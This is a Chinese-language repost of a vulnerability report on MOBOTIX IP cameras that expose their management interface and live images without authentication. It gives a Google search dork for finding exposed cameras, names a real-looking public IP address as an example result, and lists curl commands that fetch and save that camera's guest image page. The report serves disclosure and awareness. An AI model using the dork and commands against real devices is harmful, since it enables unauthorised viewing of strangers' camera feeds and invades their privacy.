MOBOTIX IP摄像头未授权访问漏洞技术分析

本文详细披露了MOBOTIX IP摄像头存在的一个未授权访问安全漏洞。攻击者无需任何认证即可直接访问摄像头管理界面并获取实时画面,涉及Google Dork搜索、漏洞验证及curl命令数据抓取等技术细节。

MOBOTIX IP cameras Unauthenticated access

2025.06.20 Credit: hasanwlip

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-306

Dork: intext:"© 2001-2025 MOBOTIX" -site:*.* -inurl:www

漏洞验证步骤

步骤 1:通过Google Dork搜索

结果示例: http://195.70.120.133/

步骤 2:在浏览器中访问该IP地址

摄像头管理界面直接加载,无需任何身份验证。

步骤 3:使用cURL捕获摄像头界面内容 

1

curl http://195.70.120.133/cgi-bin/guestimage.html

可选操作:将原始HTML内容保存到文件 

1

curl http://195.70.120.133/cgi-bin/guestimage.html --output snap.html

参考链接

  1. https://www.google.com/search?q=intext:%22%C2%A9+2001-2025+MOBOTIX%22+-site:.+-inurl:www
  2. https://www.mobotix.com/en (官方供应商网站)
  3. 漏洞发现与报告者:hasanwlip

查看此报告的原始版本

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次